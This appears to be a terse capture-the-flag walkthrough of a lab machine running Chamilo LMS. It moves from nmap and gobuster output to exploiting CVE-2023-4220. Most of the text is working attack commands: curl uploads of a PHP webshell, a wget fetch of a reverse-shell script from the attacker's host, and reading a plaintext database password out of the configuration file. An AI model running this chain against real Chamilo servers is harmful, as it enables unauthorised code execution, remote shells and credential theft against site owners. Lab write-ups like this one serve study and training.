nmap:
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAyYzjPGuVga97Y5vl5BajgMpjiGqUWp23U2DO9Kij5AhK3lyZFq/rroiDu7zYpMTCkFAk0fICBScfnuLHi6NOI=
|   256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8A41tX6hHpQeDLNhKf2QuBM7kqwhIBXGZ4jiOsbYCI
80/tcp open  http    syn-ack Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: eLEARNING
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster:
/.                    (Status: 200) [Size: 36182]
/404.html             (Status: 200) [Size: 10428]
/LICENSE.txt          (Status: 200) [Size: 1422]
/about.html           (Status: 200) [Size: 20542]
/contact.html         (Status: 200) [Size: 14753]
/css/                 (Status: 200) [Size: 1140]
/css                  (Status: 200) [Size: 1140]
/img/                 (Status: 200) [Size: 4406]
/img                  (Status: 200) [Size: 4406]
/index.html           (Status: 200) [Size: 36182]
/js/                  (Status: 200) [Size: 922]
/js                   (Status: 200) [Size: 922]
/lib/                 (Status: 200) [Size: 1714]

there is subdomain present:
lms.permx.htb 

added to /etc/hosts

after short search in google i get the CVE:
https://starlabs.sg/advisories/23/23-4220/

actions for exploit:
echo '<?php system("id"); ?>' > rce.php

curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.

curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

now we will use php-simple-reverse-shell.php to get inside

copy it to my folder, changing the ip

uploading it via:
http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php?0=wget http://<my IP>:80/rv4455.php

launching the listener and triggering it via:
http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rv4455.php

and we get reverse shell as www-data

2 users got bash shell:
root:x:0:0:root:/root:/bin/bash
mtz:x:1000:1000:mtz:/home/mtz:/bin/bash

mysql running in netstat

www-data@permx:/var/www/chamilo$ cat cli-config.php
cat cli-config.php
<?php
/* For licensing terms, see /license.txt */

/**
 * Script needed to execute bin/doctrine.php in the command line
 * in order to:.
 *
 * - Generate migrations
 * - Create schema
 * - Update schema
 * - Validate schema
 * - Etc
 */
use Doctrine\ORM\Tools\Console\ConsoleRunner;

require_once __DIR__.'/vendor/autoload.php';
//require_once __DIR__.'/main/inc/lib/api.lib.php';
$configurationFile = __DIR__.'/app/config/configuration.php';

if (!is_file($configurationFile)) {
    echo "File does not exists: $configurationFile";
    exit();
}

require_once __DIR__.'/main/inc/global.inc.php';
require_once $configurationFile;

$database = new \Database();
$dbParams = [
    'driver' => 'pdo_mysql',
    'host' => $_configuration['db_host'],
    'user' => $_configuration['db_user'],
    'password' => $_configuration['db_password'],
    'dbname' => $_configuration['main_database'],
];

$database->connect($dbParams, realpath(__DIR__).'/', realpath(__DIR__).'/');
$entityManager = $database::getManager();

$helperSet = ConsoleRunner::createHelperSet($entityManager);
$dialogHelper = new Symfony\Component\Console\Helper\QuestionHelper();
$helperSet->set($dialogHelper);

return $helperSet;

www-data@permx:/var/www/chamilo/app/config$ cat configuration.php |grep pass
cat configuration.php |grep pass
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

www-data@permx:/var/www/chamilo/app/config$ cat configuration.php |grep user
cat configuration.php |grep user
$_configuration['db_user'] = 'chamilo';